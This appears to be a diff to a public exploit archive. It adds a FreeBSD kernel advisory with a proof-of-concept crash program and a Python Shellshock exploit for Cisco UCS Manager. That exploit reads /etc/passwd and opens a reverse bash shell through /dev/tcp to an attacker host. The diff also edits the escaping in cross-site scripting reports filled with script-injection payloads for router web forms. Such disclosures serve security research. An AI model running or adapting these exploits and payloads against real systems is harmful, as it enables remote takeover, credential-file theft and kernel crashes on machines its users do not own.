--- a/platforms/asp/webapps/9856.txt
+++ b/platforms/asp/webapps/9856.txt
@ -16,7 +16,7 @@ onLoad="alert(document.cookie)[/sound]
 ######
 ###### LINK XSS
-http://localhost/forum/pop_send_to_friend.asp?url=</textarea><img
+http://localhost/forum/pop_send_to_friend.asp?url=&lt;/textarea&gt;<img
 src="http://www.google.it/intl/it_it/images/logo.gif"; onLoad
 ="alert(document.cookie)">
--- a/platforms/freebsd_x86-64/dos/39570.c
+++ b/platforms/freebsd_x86-64/dos/39570.c
@ -0,0 +1,227 @@
 /*
 1. Advisory Information
 Title: FreeBSD Kernel amd64_set_ldt Heap Overflow
 Advisory ID: CORE-2016-0005
 Advisory URL: http://www.coresecurity.com/content/freebsd-kernel-amd64_set_ldt-heap-overflow
 Date published: 2016-03-16
 Date of last update: 2016-03-14
 Vendors contacted: FreeBSD
 Release mode: Coordinated release
 2. Vulnerability Information
 Class: Unsigned to Signed Conversion Error [CWE-196]
 Impact: Denial of service
 Remotely Exploitable: No
 Locally Exploitable: Yes
 CVE Name: CVE-2016-1885
 3. Vulnerability Description
 FreeBSD is an advanced computer operating system used to power modern servers, desktops and embedded platforms. A large community has continually developed it for more than thirty years. Its advanced networking, security and storage features have made FreeBSD the platform of choice for many of the busiest web sites and most pervasive embedded networking and storage devices.
 An integer signedness error has been found in the amd64_set_ldt() function in the FreeBSD kernel code (defined in the /sys/amd64/amd64/sys_machdep.c file), which implements the i386_set_ldt system call on the amd64 version of the OS. This integer signedness issue ultimately leads to a heap overflow in the kernel, allowing local unprivileged attackers to crash the system.
 4. Vulnerable packages
 FreeBSD 10.2 amd64.
 Other amd64 versions may be affected too but they were no checked.
 5. Non-vulnerable packages
 FreeBSD 10.2-RELENG.
 6. Vendor Information, Solutions and Workarounds
 The FreeBSD team has released patches for the reported vulnerabilities. You should upgrade to FreeBSD 10.2-RELENG.
 7. Credits
 This vulnerability was discovered and researched by Francisco Falcon from Core Exploit Writers Team. The publication of this advisory was coordinated by Joaquin Rodriguez Varela from Core Advisories Team.
 8. Technical Description / Proof of Concept Code
 8.1. FreeBSD amd64_set_ldt Integer Signedness Vulnerability
 [CVE-2016-1885] FreeBSD exposes the i386_set_ldt[1] architecture-dependent system call for its Intel i386 version. This system call can be used to manage i386 per-process Local Descriptor Table (LDT) entries. The amd64 version of FreeBSD still exposes this system call for 32-bit applications running on the 64-bit version of the OS.
 Architecture-specific system calls are handled by the FreeBSD kernel in the sysarch() function, which is defined in the /sys/amd64/amd64/sys_machdep.c[2] file:
 int
 sysarch(td, uap)
    struct thread *td;
    register struct sysarch_args *uap;
 {
 [...]
 if (uap->op == I386_GET_LDT || uap->op == I386_SET_LDT)
    return (sysarch_ldt(td, uap, UIO_USERSPACE));
 [...]
 As we can see in the code snippet above, if the system call being invoked is either I386_GET_LDT or I386_SET_LDT, then the sysarch_ldt() function is called. The following code excerpt shows the part of the sysarch_ldt() function that is in charge of handling the I386_SET_LDT syscall:
 int
 sysarch_ldt(struct thread *td, struct sysarch_args *uap, int uap_space)
 {
 struct i386_ldt_args *largs, la;
 struct user_segment_descriptor *lp;
 [...]
 switch (uap->op) {
    [...]
    case I386_SET_LDT:
            if (largs->descs != NULL && largs->num > max_ldt_segment)
                return (EINVAL);
            set_pcb_flags(td->td_pcb, PCB_FULL_IRET);
            if (largs->descs != NULL) {
                lp = malloc(largs->num * sizeof(struct
                    user_segment_descriptor), M_TEMP, M_WAITOK);
                error = copyin(largs->descs, lp, largs->num *
                    sizeof(struct user_segment_descriptor));
                if (error == 0)
                    error = amd64_set_ldt(td, largs, lp);
                free(lp, M_TEMP);
            } else {
                error = amd64_set_ldt(td, largs, NULL);
            }
            break;
 The largs variable that can be seen there is a pointer to an i386_ldt_args structure, which is defined as follows in the /sys/x86/include/sysarch.h[3] file:
 struct i386_ldt_args {
    unsigned int start;
    union descriptor *descs;
    unsigned int num;
 };
 Note that all of the fields of the i386_ldt_args structure are fully user-controlled: they match the 3 arguments specified by the user when i386_set_ldt() was called from user mode:
 int i386_set_ldt(int start_sel, union descriptor *descs, int num_sels);
 From the sysarch_ldt() snippet above we can see that if we call i386_set_ldt() from user mode specifying a NULL pointer as the second argument (largs->descs), then it will end up calling the amd64_set_ldt() function, passing the largs variable as the second argument, and a NULL pointer as the third argument. This is the prototype of the amd64_set_ldt() function being called:
 int
 amd64_set_ldt(struct thread *td, struct i386_ldt_args *uap, struct user_segment_descriptor *descs);
 amd64_set_ldt() is the vulnerable function here. Since it is being called with its third argument (the descs pointer) set to NULL, the following code path will be executed (remember that every field in the i386_ldt_args structure pointed by the uap pointer is fully controlled from user mode):
    int
    amd64_set_ldt(td, uap, descs)
        struct thread *td;
        struct i386_ldt_args *uap;
        struct user_segment_descriptor *descs;
    {
    [...]
        int largest_ld;
    [...]
 608        if (descs == NULL) {
 609                 Free descriptors 
 610                if (uap->start == 0 && uap->num == 0)
 611                        uap->num = max_ldt_segment;
 612                if (uap->num == 0)
 613                        return (EINVAL);
 614                if ((pldt = mdp->md_ldt) == NULL ||
 615                    uap->start >= max_ldt_segment)
 616                        return (0);
 617                largest_ld = uap->start + uap->num;
 618                if (largest_ld > max_ldt_segment)
 619                        largest_ld = max_ldt_segment;
 620                i = largest_ld - uap->start;
 621                mtx_lock(&dt_lock);
 622                bzero(&((struct user_segment_descriptor *)(pldt->ldt_base))
 623                    [uap->start], sizeof(struct user_segment_descriptor) * i);
 624                mtx_unlock(&dt_lock);
 625                return (0);
 626        }
 The two if statements at lines 610 and 612 perform some sanity checks against uap->start and uap->num, which can be avoided by setting uap->num to a value different than 0. The next check at lines 614/615 will cause the function to exit early if the mdp->md_ldt pointer is NULL, or if uap->start is greater or equal than max_ldt_segment (1024). Having mdp->md_ldt holding a non-NULL value can be achieved by adding an initial entry to the process LDT before triggering the bug, like this:
    struct segment_descriptor desc = {0, 0, SDT_MEMRW, SEL_UPL, 1, 0, 0, 1, 0 ,0}; 
    i386_set_ldt(LDT_AUTO_ALLOC, (union descriptor *) &desc, 1);
 After passing those checks we reach the vulnerable code at lines 617-619:
 617                largest_ld = uap->start + uap->num;
 618                if (largest_ld > max_ldt_segment)
 619                        largest_ld = max_ldt_segment;
 620                i = largest_ld - uap->start;
 Note that largest_ld is a signed int that will hold the sum of uap->start + uap->num. The code at lines 618-619 tries to ensure that largest_ld is not greater than max_ldt_segment (1024); however, being largest_ld a signed integer holding a value fully controlled from user mode, it will perform a signed comparison that can be bypassed by setting uap->num to a negative number.
 This signedness error will ultimately lead to a heap overflow in the FreeBSD kernel when the bzero() function is later called with a huge value as its len parameter:
 622                bzero(&((struct user_segment_descriptor *)(pldt->ldt_base))
 623                    [uap->start], sizeof(struct user_segment_descriptor) * i);
 8.2. Proof of Concept
 The following Proof-of-Concept code reproduces the vulnerability in a default FreeBSD 10.2-RELEASE-amd64 installation running a GENERIC kernel:
 */
 /* $ clang amd64_set_ldt.c -o amd64_set_ldt -m32 */
 #include <stdio.h>
 #include <unistd.h>
 #include <machine/segments.h>
 #include <machine/sysarch.h>
 #include <sysexits.h>
 #include <err.h>
 int main(int argc, char **argv){
    int res;
    struct segment_descriptor desc = {0, 0, SDT_MEMRW, SEL_UPL, 1, 0, 0, 1, 0 ,0}; 
    printf("[+] Adding an initial entry to the process LDT...\n");
    res = i386_set_ldt(LDT_AUTO_ALLOC, (union descriptor *) &desc, 1);
    if (res < 0){
        err(EX_OSERR, "i386_set_ldt(LDT_AUTO_ALLOC)");
    }
    printf("returned index: %d\n", res);
    printf("Triggering the bug...\n");
    res = i386_set_ldt(1, NULL, 0x80000000);
 }
 /*
 9. Report Timeline
 2016-03-02: Core Security sent an initial notification to FreeBSD.
 2016-03-02: FreeBSD confirmed reception of our email and requested we sent them a draft version of the advisory.
 2016-03-02: Core Security sent FreeBSD a draft version of the advisory. We requested them to let us know once they finished reviewing the advisory in order to coordinate a publication date.
 2016-03-11: Core Security asked FreeBSD if they were able to review and verify the reported issue. We additionally requested an estimated date for releasing the fix/update.
 2016-03-11: FreeBSD informed us they were going to release the update in the middle of the following week.
 2016-03-11: Core Security asked FreeBSD if they had the specific date and time they were going to release the update. We additionally requested a CVE identifier for the vulnerability considering they are registered as a CNA.
 2016-03-11: FreeBSD informed us they would probably release it on Wednesday 16th of March and that they assigned the CVE-2016-1885 ID.
 2016-03-16: Advisory CORE-2016-0005 published.
 10. References
 [1] https://www.freebsd.org/cgi/man.cgi?query=i386_set_ldt&sektion=2&manpath=FreeBSD+8.2-RELEASE
 [2] https://svnweb.freebsd.org/base/release/10.2.0/sys/amd64/amd64/sys_machdep.c?view=markup
 [3] https://svnweb.freebsd.org/base/release/10.2.0/sys/x86/include/sysarch.h?view=markup
 11. About CoreLabs
 CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.
 12. About Core Security Technologies
 Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations.
 Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com.
 13. Disclaimer
 The contents of this advisory are copyright (c) 2014 Core Security and (c) 2014 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
 14. PGP/GPG Keys
 This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
 */
--- a/platforms/hardware/remote/39568.py
+++ b/platforms/hardware/remote/39568.py
@ -0,0 +1,65 @@
 #!/usr/bin/python
 ###############################################
 # Cisco UCS Manager 2.1(1b) Shellshock Exploit
 # 
 # CVE-2014-6278
 # Confirmed on version 2.1(1b), but more are likely vulnerable.
 # Cisco's advisory: 
 # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash
 # Exploit generates a reverse shell to a nc listener.
 # Exploit Author: @thatchriseckert
 ###############################################
 import sys
 import requests
 import time
 if len(sys.argv) < 4:
 	print "\n[*] Cisco UCS Manager 2.1(1b) Shellshock Exploit"
 	print "[*] Usage: <Victim IP> <Attacking Host> <Reverse Shell Port>" 
 	print "[*]"
 	print "[*] Example: shellshock.py 127.0.0.1 127.0.0.1 4444"
 	print "[*] Listener: nc -lvp <port>"
 	print "\n"
 	sys.exit()
 #Disables request warning for cert validation ignore.
 requests.packages.urllib3.disable_warnings() 
 ucs = sys.argv[1]
 url = "https://" + ucs + "/ucsm/isSamInstalled.cgi"
 attackhost = sys.argv[2]
 revshellport = sys.argv[3]
 headers1 = {
 		'User-Agent': '() { ignored;};/bin/bash -i >& /dev/tcp/' + attackhost + '/' + revshellport + ' 0>&1'
 		}
 headers2 = {
 		"User-Agent": '() { test;};echo \"Content-type: text/plain\"; echo; echo; echo $(</etc/passwd)'
 		}
 def exploit():
 	try:
 		r = requests.get(url, headers=headers1, verify=False, timeout=5)
 	except Exception, e:
 		if 'timeout' in str(e):
 			print "[+] Success.  Enjoy your shell..."
 		else:
 			print "[-] Something is wrong..."
 			print "[-] Error: " + str(e)
 def main():
 	try:
 		r = requests.get(url, headers=headers2, verify=False, timeout=3)
 		if r.content.startswith('\nroot:'):
 			print "[+] Host is vulnerable, spawning shell..."
 			time.sleep(3)
 			exploit()
 		else:
 			print "[-] Host is not vulnerable, quitting..."
 			sys.exit()
 	except Exception, e:
 		print "[-] Something is wrong..."
 		print "[-] Error: " + str(e)
 if __name__ == "__main__":
 	main()
--- a/platforms/hardware/webapps/10276.txt
+++ b/platforms/hardware/webapps/10276.txt
@ -115,9 +115,9 @@ The POST variable BackButton has been set to >"><ScRiPt%20%0a%0d>alert(416215520
 /Forms/error_1
 Details
-The POST variable BackButton has been set to </textarea><ScRiPt%20%0a%0d>alert(416225520282)%3B</ScRiPt> .
+The POST variable BackButton has been set to &lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(416225520282)%3B</ScRiPt> .
-BackButton=</textarea><ScRiPt%20%0a%0d>alert(416225520282)%3B</ScRiPt>
+BackButton=&lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(416225520282)%3B</ScRiPt>
 ##################################################################################################################################
@ -199,9 +199,9 @@ wzConnFlag=%3Cimg%20src%3D%22JaVaS%26%2399%3BRiPt:alert%28401565272624%29%3B%22%
 /Forms/fresh_pppoe_1
 Details
-The POST variable wzConnFlag has been set to </textarea><ScRiPt%20%0a%0d>alert(401515272624)%3B</ScRiPt> .
+The POST variable wzConnFlag has been set to &lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(401515272624)%3B</ScRiPt> .
-wzConnFlag=</textarea><ScRiPt%20%0a%0d>alert(401515272624)%3B</ScRiPt>
+wzConnFlag=&lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(401515272624)%3B</ScRiPt>
 ##################################################################################################################################
@ -274,9 +274,9 @@ diag_pppindex_argen=email@some<ScRiPt%20%0a%0d>alert(407145360657)%3B</ScRiPt>do
 /Forms/rpDiag_argen_1
 Details
-The POST variable diag_pppindex_argen has been set to </textarea><ScRiPt%20%0a%0d>alert(407115360657)%3B</ScRiPt> .
+The POST variable diag_pppindex_argen has been set to &lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(407115360657)%3B</ScRiPt> .
-diag_pppindex_argen=</textarea><ScRiPt%20%0a%0d>alert(407115360657)%3B</ScRiPt>&DiagArgenTest=Test&DiagStartFlag=0
+diag_pppindex_argen=&lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(407115360657)%3B</ScRiPt>&DiagArgenTest=Test&DiagStartFlag=0
 ##################################################################################################################################
@ -369,9 +369,9 @@ diag_pppindex_argen=0&DiagArgenTest=Test&DiagStartFlag=<script>alert(40717536066
 /Forms/rpDiag_argen_1
 Details
-The POST variable DiagStartFlag has been set to </textarea><ScRiPt%20%0a%0d>alert(407215360661)%3B</ScRiPt> .
+The POST variable DiagStartFlag has been set to &lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(407215360661)%3B</ScRiPt> .
-diag_pppindex_argen=0&DiagArgenTest=Test&DiagStartFlag=</textarea><ScRiPt%20%0a%0d>aler
+diag_pppindex_argen=0&DiagArgenTest=Test&DiagStartFlag=&lt;/textarea&gt;<ScRiPt%20%0a%0d>aler
 ##################################################################################################################################
@ -401,9 +401,9 @@ wzdmz_active=</title><ScRiPt%20%0a%0d>alert(414945497855)%3B</ScRiPt>&wzdmzHostI
 /Forms/rpNATdmz_argen_1
 Details
-The POST variable wzdmz_active has been set to </textarea><ScRiPt%20%0a%0d>alert(414935497855)%3B</ScRiPt> .
+The POST variable wzdmz_active has been set to &lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(414935497855)%3B</ScRiPt> .
-wzdmz_active=</textarea><ScRiPt%20%0a%0d>alert(414935497855)%3B</ScRiPt>&wzdmzHostIP=0%2E0%2E0%2E0&NATDMZApply=Aceptar
+wzdmz_active=&lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(414935497855)%3B</ScRiPt>&wzdmzHostIP=0%2E0%2E0%2E0&NATDMZApply=Aceptar
 ##################################################################################################################################
@ -473,9 +473,9 @@ wzdmz_active=>'><ScRiPt%20%0a%0d>alert(414915497855)%3B</ScRiPt>&wzdmzHostIP=0%2
 /Forms/rpNATdmz_argen_1
 Details
-The POST variable wzdmzHostIP has been set to </textarea><ScRiPt%20%0a%0d>alert(415035497857)%3B</ScRiPt> .
+The POST variable wzdmzHostIP has been set to &lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(415035497857)%3B</ScRiPt> .
-wzdmz_active=1&wzdmzHostIP=</textarea><ScRiPt%20%0a%0d>alert(415035497857)%3B</ScRiPt>&NATDMZApply=Aceptar
+wzdmz_active=1&wzdmzHostIP=&lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(415035497857)%3B</ScRiPt>&NATDMZApply=Aceptar
 ##################################################################################################################################
@ -553,9 +553,9 @@ wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_startPort=0&wzV
 /Forms/rpNATvirsvr_argen_1
 Details
-The POST variable wzVIRTUALSVR_endPort has been set to </textarea><ScRiPt%20%0a%0d>alert(409405385265)%3B</ScRiPt> .
+The POST variable wzVIRTUALSVR_endPort has been set to &lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(409405385265)%3B</ScRiPt> .
-wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_startPort=0&wzVIRTUALSVR_endPort=</textarea><ScRiPt%20%0a%0d>alert(409405385265)%3B</ScRiPt>&wzVIRTUALSVR_localIP=0%2E0%2E0%2E0&wzVIRTUALSVR_startPortLocal=0&wzVIRTUALSVR_endPortLocal=0&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar
+wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_startPort=0&wzVIRTUALSVR_endPort=&lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(409405385265)%3B</ScRiPt>&wzVIRTUALSVR_localIP=0%2E0%2E0%2E0&wzVIRTUALSVR_startPortLocal=0&wzVIRTUALSVR_endPortLocal=0&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar
 ##################################################################################################################################
@ -655,9 +655,9 @@ wzVIRTUALSVR_index=111-222-1933email@address.tst&wzVIRTUALSVR_IndexFlag=0&wzVIRT
 /Forms/rpNATvirsvr_argen_1
 Details
-The POST variable wzVIRTUALSVR_endPort has been set to </textarea><ScRiPt%20%0a%0d>alert(408805384923)%3B</ScRiPt> .
+The POST variable wzVIRTUALSVR_endPort has been set to &lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(408805384923)%3B</ScRiPt> .
-wzVIRTUALSVR_index=111-222-1933email@address.tst&wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_App_idx=111-222-1933email@address.tst&wzVSProtocolIndex=111-222-1933email@address.tst&wzVIRTUALSVR_startPort=0&wzVIRTUALSVR_endPort=</textarea><ScRiPt%20%0a%0d>alert(408805384923)%3B</ScRiPt>&wzVIRTUALSVR_localIP=0%2E0%2E0%2E0&wzVIRTUALSVR_startPortLocal=0&wzVIRTUALSVR_endPortLocal=0&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar
+wzVIRTUALSVR_index=111-222-1933email@address.tst&wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_App_idx=111-222-1933email@address.tst&wzVSProtocolIndex=111-222-1933email@address.tst&wzVIRTUALSVR_startPort=0&wzVIRTUALSVR_endPort=&lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(408805384923)%3B</ScRiPt>&wzVIRTUALSVR_localIP=0%2E0%2E0%2E0&wzVIRTUALSVR_startPortLocal=0&wzVIRTUALSVR_endPortLocal=0&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar
 ##################################################################################################################################
@ -781,9 +781,9 @@ wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_startPort=0&wzV
 /Forms/rpNATvirsvr_argen_1
 Details
-The POST variable wzVIRTUALSVR_endPortLocal has been set to </textarea><ScRiPt%20%0a%0d>alert(409105385033)%3B</ScRiPt> .
+The POST variable wzVIRTUALSVR_endPortLocal has been set to &lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(409105385033)%3B</ScRiPt> .
-wzVIRTUALSVR_index=111-222-1933email@address.tst&wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_App_idx=111-222-1933email@address.tst&wzVSProtocolIndex=111-222-1933email@address.tst&wzVIRTUALSVR_startPort=0&wzVIRTUALSVR_endPort=0&wzVIRTUALSVR_localIP=0%2E0%2E0%2E0&wzVIRTUALSVR_startPortLocal=0&wzVIRTUALSVR_endPortLocal=</textarea><ScRiPt%20%0a%0d>alert(409105385033)%3B</ScRiPt>&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar
+wzVIRTUALSVR_index=111-222-1933email@address.tst&wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_App_idx=111-222-1933email@address.tst&wzVSProtocolIndex=111-222-1933email@address.tst&wzVIRTUALSVR_startPort=0&wzVIRTUALSVR_endPort=0&wzVIRTUALSVR_localIP=0%2E0%2E0%2E0&wzVIRTUALSVR_startPortLocal=0&wzVIRTUALSVR_endPortLocal=&lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(409105385033)%3B</ScRiPt>&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar
 ##################################################################################################################################
@ -821,9 +821,9 @@ wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_startPort=0&wzV
 /Forms/rpNATvirsvr_argen_1
 Details
-The POST variable wzVIRTUALSVR_endPortLocal has been set to </textarea><ScRiPt%20%0a%0d>alert(409705385375)%3B</ScRiPt> .
+The POST variable wzVIRTUALSVR_endPortLocal has been set to &lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(409705385375)%3B</ScRiPt> .
-wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_startPort=0&wzVIRTUALSVR_endPort=0&wzVIRTUALSVR_localIP=0%2E0%2E0%2E0&wzVIRTUALSVR_startPortLocal=0&wzVIRTUALSVR_endPortLocal=</textarea><ScRiPt%20%0a%0d>alert(409705385375)%3B</ScRiPt>&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar
+wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_startPort=0&wzVIRTUALSVR_endPort=0&wzVIRTUALSVR_localIP=0%2E0%2E0%2E0&wzVIRTUALSVR_startPortLocal=0&wzVIRTUALSVR_endPortLocal=&lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(409705385375)%3B</ScRiPt>&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar
 ##################################################################################################################################
@ -845,7 +845,7 @@ wzVIRTUALSVR_index=111-222-1933email@address.tst&wzVIRTUALSVR_IndexFlag=</title>
 /Forms/rpNATvirsvr_argen_1
 Details
-The POST variable wzVIRTUALSVR_IndexFlag has been set to </textarea><ScRiPt%20%0a%0d>alert(408605384811)%3B</ScRiPt> .wzVIRTUALSVR_index=111-222-1933email@address.tst&wzVIRTUALSVR_IndexFlag=</textarea><ScRiPt%20%0a%0d>alert(408605384811)%3B</ScRiPt>&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_App_idx=111-222-1933email@address.tst&wzVSProtocolIndex=111-222-1933email@address.tst&wzVIRTUALSVR_startPort=0&wzVIRTUALSVR_endPort=0&wzVIRTUALSVR_localIP=0%2E0%2E0%2E0&wzVIRTUALSVR_startPortLocal=0&wzVIRTUALSVR_endPortLocal=0&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar
+The POST variable wzVIRTUALSVR_IndexFlag has been set to &lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(408605384811)%3B</ScRiPt> .wzVIRTUALSVR_index=111-222-1933email@address.tst&wzVIRTUALSVR_IndexFlag=&lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(408605384811)%3B</ScRiPt>&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_App_idx=111-222-1933email@address.tst&wzVSProtocolIndex=111-222-1933email@address.tst&wzVIRTUALSVR_startPort=0&wzVIRTUALSVR_endPort=0&wzVIRTUALSVR_localIP=0%2E0%2E0%2E0&wzVIRTUALSVR_startPortLocal=0&wzVIRTUALSVR_endPortLocal=0&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar
 ##################################################################################################################################
@ -944,9 +944,9 @@ wzVIRTUALSVR_IndexFlag=>'><ScRiPt%20%0a%0d>alert(409185385252)%3B</ScRiPt>&wzVIR
 /Forms/rpNATvirsvr_argen_1
 Details
-The POST variable wzVIRTUALSVR_IndexFlag has been set to </textarea><ScRiPt%20%0a%0d>alert(409205385252)%3B</ScRiPt> .
+The POST variable wzVIRTUALSVR_IndexFlag has been set to &lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(409205385252)%3B</ScRiPt> .
-wzVIRTUALSVR_IndexFlag=</textarea><ScRiPt%20%0a%0d>alert(409205385252)%3B</ScRiPt>&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_startPort=0&wzVIRTUALSVR_endPort=0&wzVIRTUALSVR_localIP=0%2E0%2E0%2E0&wzVIRTUALSVR_startPortLocal=0&wzVIRTUALSVR_endPortLocal=0&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar
+wzVIRTUALSVR_IndexFlag=&lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(409205385252)%3B</ScRiPt>&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_startPort=0&wzVIRTUALSVR_endPort=0&wzVIRTUALSVR_localIP=0%2E0%2E0%2E0&wzVIRTUALSVR_startPortLocal=0&wzVIRTUALSVR_endPortLocal=0&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar
 ##################################################################################################################################
@ -1072,9 +1072,9 @@ wzVIRTUALSVR_index=111-222-1933email@address.tst&wzVIRTUALSVR_IndexFlag=0&wzVIRT
 /Forms/rpNATvirsvr_argen_1
 Details
-The POST variable wzVIRTUALSVR_localIP has been set to </textarea><ScRiPt%20%0a%0d>alert(408905384923)%3B</ScRiPt> .
+The POST variable wzVIRTUALSVR_localIP has been set to &lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(408905384923)%3B</ScRiPt> .
-wzVIRTUALSVR_index=111-222-1933email@address.tst&wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_App_idx=111-222-1933email@address.tst&wzVSProtocolIndex=111-222-1933email@address.tst&wzVIRTUALSVR_startPort=0&wzVIRTUALSVR_endPort=0&wzVIRTUALSVR_localIP=</textarea><ScRiPt%20%0a%0d>alert(408905384923)%3B</ScRiPt>&wzVIRTUALSVR_startPortLocal=0&wzVIRTUALSVR_endPortLocal=0&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar
+wzVIRTUALSVR_index=111-222-1933email@address.tst&wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_App_idx=111-222-1933email@address.tst&wzVSProtocolIndex=111-222-1933email@address.tst&wzVIRTUALSVR_startPort=0&wzVIRTUALSVR_endPort=0&wzVIRTUALSVR_localIP=&lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(408905384923)%3B</ScRiPt>&wzVIRTUALSVR_startPortLocal=0&wzVIRTUALSVR_endPortLocal=0&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar
 ##################################################################################################################################
@ -1120,9 +1120,9 @@ wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_startPort=0&wzV
 /Forms/rpNATvirsvr_argen_1
 Details
-The POST variable wzVIRTUALSVR_localIP has been set to </textarea><ScRiPt%20%0a%0d>alert(409505385265)%3B</ScRiPt> .
+The POST variable wzVIRTUALSVR_localIP has been set to &lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(409505385265)%3B</ScRiPt> .
-wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_startPort=0&wzVIRTUALSVR_endPort=0&wzVIRTUALSVR_localIP=</textarea><ScRiPt%20%0a%0d>alert(409505385265)%3B</ScRiPt>&wzVIRTUALSVR_startPortLocal=0&wzVIRTUALSVR_endPortLocal=0&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar
+wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_startPort=0&wzVIRTUALSVR_endPort=0&wzVIRTUALSVR_localIP=&lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(409505385265)%3B</ScRiPt>&wzVIRTUALSVR_startPortLocal=0&wzVIRTUALSVR_endPortLocal=0&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar
 ##################################################################################################################################
@ -1190,9 +1190,9 @@ wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_startPort=--><S
 /Forms/rpNATvirsvr_argen_1
 Details
-The POST variable wzVIRTUALSVR_startPort has been set to </textarea><ScRiPt%20%0a%0d>alert(409305385263)%3B</ScRiPt> .
+The POST variable wzVIRTUALSVR_startPort has been set to &lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(409305385263)%3B</ScRiPt> .
-wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_startPort=</textarea><ScRiPt%20%0a%0d>alert(409305385263)%3B</ScRiPt>&wzVIRTUALSVR_endPort=0&wzVIRTUALSVR_localIP=0%2E0%2E0%2E0&wzVIRTUALSVR_startPortLocal=0&wzVIRTUALSVR_endPortLocal=0&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar
